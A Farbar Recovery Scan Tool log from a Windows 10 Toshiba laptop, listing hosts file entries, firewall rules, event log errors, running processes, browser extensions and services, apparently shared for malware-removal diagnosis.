HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 09:25 - 2016-05-24 01:02 - 00001006 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.76.76 - 75.75.75.75
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\StartupApproved\StartupFolder: => "PalTalk.lnk"
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\StartupApproved\Run: => "Skype"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{F9C1770F-D850-4923-AFE4-D71E5AE14530}] => (Allow) C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe
FirewallRules: [{1232286A-8F92-4E58-93F0-BBF2488813CF}] => (Allow) C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe
FirewallRules: [{C9252ADA-1EE3-4B34-BED3-3188608D9B68}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{C505C96A-5C1F-428E-88D0-70B331737D28}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{8007845D-0C57-4BD7-A2B5-8DDD8664C546}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{1E55AE08-5B94-4330-9B93-53F185195649}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{B6B0FDE9-6B22-4B06-B5B7-00E4D431B81A}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{60C3ABB2-5B37-48F4-AE35-AA8B6DA551CA}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{3A59B2D5-CF88-4DD8-BEDD-D6F41BAF83BA}] => (Allow) C:\Program Files (x86)\AVG\Av\avgmfapx.exe
FirewallRules: [{096CC655-267C-4ABE-88BB-239987B04D67}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{2D4E5BA9-7E14-4737-9FC9-B69267E903B3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{EB24EF20-B547-498A-92EA-C60255901E84}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-05-2016 18:31:06 End of disinfection

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (05/30/2016 04:52:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/30/2016 04:52:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/27/2016 11:46:23 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mmc.exe, version: 10.0.10586.0, time stamp: 0x5632d42c
Faulting module name: KERNELBASE.dll, version: 10.0.10586.306, time stamp: 0x571af331
Exception code: 0x00000000
Fault offset: 0x0000000000071f28
Faulting process id: 0x3d8
Faulting application start time: 0xmmc.exe0
Faulting application path: mmc.exe1
Faulting module path: mmc.exe2
Report Id: mmc.exe3
Faulting package full name: mmc.exe4
Faulting package-relative application ID: mmc.exe5

Error: (05/26/2016 06:31:27 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:25:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP2)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

Error: (05/26/2016 04:25:11 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:22:34 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP2)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

Error: (05/26/2016 04:20:29 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (05/26/2016 04:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP2)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (05/26/2016 04:16:52 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY)
Description: Content is missing.
Error Code:a7f42014

System errors:
=============
Error: (05/30/2016 11:21:37 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_51a4a82 service to connect.

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_51a4a82 service to connect.

Error: (05/30/2016 10:38:27 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the User Data Storage_51a4a82 service, but this action failed with the following error:
%%1056

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_51a4a82 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (05/30/2016 10:38:16 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (05/30/2016 07:09:36 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

CodeIntegrity:
===================================
Date: 2016-05-25 18:20:08.795
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:08.764
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:07.972
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:20:07.896
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:05:19.957
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 18:05:19.822
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:36.052
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:35.969
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:35.036
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-05-25 17:48:34.956
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\AVG\Av\avgidsagenta.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU N2830 @ 2.16GHz
Percentage of memory in use: 78%
Total physical RAM: 1933.93 MB
Available physical RAM: 411.86 MB
Total Virtual: 3308.57 MB
Available Virtual: 1239.23 MB

==================== Drives ================================

Drive c: (TI10700000B) (Fixed) (Total:455.56 GB) (Free:424.68 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:29-05-2016 02
Ran by Jackie (administrator) on LAPTOP2 (31-05-2016 02:52:22)
Running from C:\Users\Jackie\Downloads
Loaded Profiles: Jackie (Available Profiles: Jackie)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Trend Micro Inc.) C:\Program Files (x86)\AntiRansomware2.0\ARService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel(R) Corporation) C:\Program Files\Intel Corporation\Intel(R) Technology Access\LegacyCsLoaderService.exe
(Intel(R) Corporation) C:\Program Files\Intel Corporation\Intel(R) Technology Access\IntelTechnologyAccessService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Toshiba Corporation) C:\Program Files\TOSHIBA\Teco\TecoService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(McAfee, Inc.) C:\Program Files\McAfee\MAT\McPvTray.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Teco\TecoResident.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Security) C:\Program Files\Common Files\McAfee\ClientAnalytics\McClientAnalytics.exe
(Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe
(Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2556768 2013-10-08] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [180016 2015-06-08] (TOSHIBA Corporation)
HKLM\...\Run: [TSSSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSSSrv.exe [296008 2013-10-21] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3946184 2015-09-15] (Synaptics Incorporated)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75
Tcpip\..\Interfaces\{66275f01-419d-4395-b1b4-21f2d8236596}: [DhcpNameServer] 75.75.76.76 75.75.75.75
Tcpip\..\Interfaces\{bb611e39-c248-4c60-a443-f92cddc7cede}: [DhcpNameServer] 192.168.1.1
ManualProxies:

Internet Explorer:
==================
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://search.msn.com/spbasic.htm
SearchScopes: HKLM -> DefaultScope {CC7D093D-4ABE-474B-A201-7825CE0EADA6} URL =
SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL =
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> OldSearch URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US0D20151020&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001 -> {0C383FBE-20B3-4164-AFB8-8107A0619E43} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-09-22] (Eyeo GmbH)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-09-22] (Eyeo GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-04-28] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-04-28] (McAfee, Inc.)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_242.dll [2016-05-26] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-04-28] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_242.dll [2016-05-26] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-04-28] ()
FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2015-11-09] (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-05-26] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\PepperFlash\pepflashplayer.dll ()
CHR Profile: C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-05-26]
CHR Extension: (Denki Word Quest) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\dibnbdoaalhdbddheelckdbghjhgkahn [2016-05-26]
CHR Extension: (Best Classic Games) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcbmdiimnpgomgicdjpndfifjiieijdk [2016-05-26]
CHR Extension: (Chrome Remote Desktop) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-05-26]
CHR Extension: (Chess) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcoafacoamancaniegeddbpojbjkfgbc [2016-05-26]
CHR Extension: (UNO 3D HD) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdkfcgceminipbgjnnimdkejmlaecebj [2016-05-26]
CHR Extension: (Jewels Quest) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghinojlokimkacfpnpaimmldijliiboe [2016-05-26]
CHR Extension: (Mahjong Solitaire Classic ) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\inonaeciahnfjfdnodcinlmmofacedah [2016-05-26]
CHR Extension: (Printiki) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jihhiodbgkjkicajlbolnnkebbigngdf [2016-05-26]
CHR Extension: (Google Hangouts) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\knipolnnllmklapflnccelgolnpehhpl [2016-05-26]
CHR Extension: (Google Hangouts) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2016-05-26]
CHR Extension: (Mahjong Solitaire) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\neojceinbonpjjcokpokpeobkhcpiloc [2016-05-26]
CHR Extension: (MONOPOLY: The World Edition) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkedhiolniniodbokjinplhaleemnfbe [2016-05-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-25]
CHR Extension: (Mobialia Chess 3D) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nngfppohnieolpklikdmhbofoabooijm [2016-05-26]
CHR Extension: (Spring Mahjong) - C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\oohmgpjbkliggjliakneoaedilbaihhl [2016-05-26]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-26]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-26]
CHR HKLM-x32\...\Chrome\Extension: [gdfjhiclilbjdpeejgcgebmmihkkofji] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AntiRansomwareService; C:\Program Files (x86)\AntiRansomware2.0\arservice.exe [100864 2015-07-30] (Trend Micro Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328624 2015-11-09] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
S3 Intel(R) TA SAM; C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-08-12] (Intel Corporation)
R2 Intel(R) TechnologyAccessLegacyCSLoader; C:\Program Files\Intel Corporation\Intel(R) Technology Access\LegacyCsLoaderService.exe [154272 2016-03-15] (Intel(R) Corporation)
R2 Intel(R) TechnologyAccessService; C:\Program Files\Intel Corporation\Intel(R) Technology Access\IntelTechnologyAccessService.exe [479392 2016-03-15] (Intel(R) Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [163592 2016-04-20] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [989192 2016-04-28] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
